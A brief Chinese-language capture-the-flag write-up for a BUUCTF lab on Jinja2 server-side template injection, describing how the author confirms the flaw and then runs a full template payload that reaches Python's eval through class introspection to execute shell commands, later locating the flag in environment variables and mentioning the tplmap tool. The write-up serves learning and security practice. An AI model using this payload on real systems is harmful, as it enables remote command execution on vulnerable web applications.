环境
BUUCTF上的在线环境,启动靶机,获取链接:
http://node4.buuoj.cn:27904
解题思路
访问后显示页面。
根据题目提示是考SSTI,所以我们传个name参数看看。
http://node4.buuoj.cn:27904/?name=12,将我们的12显示在页面。
我们在构造{
{2*3}}看看,是否存在SSTI。
成功执行了乘法,说明是存在SSTI的,接下来我们要做的是寻找可以执行命令的函数所在的类。
这里我在网上找的:
{
% for c in [].__class__.__base__.__subclasses__() %}
{
% if c.__name__ == 'catch_warnings' %}
{
% for b in c.__init__.__globals__.values() %}
{
% if b.__class__ == {
}.__class__ %}
{
% if 'eval' in b.keys() %}
{
{
b['eval']('__import__("os").popen("id").read()') }}
{
% endif %}
{
% endif %}
{
% endfor %}
{
% endif %}
{
% endfor %}
成功执行,接下来找flag,最后发现在env中发现了flag。
通过网上的资料了解到tplmap脚本可以梭哈。
参考
https://blog.csdn.net/qq_36241198/article/details/114882798
SSTI模板注入绕过(进阶篇)
SSTI模板注入及绕过姿势(基于Python-Jinja2)
[Flask(Jinja2)服务端模板注入漏洞(SSTI)]学习简记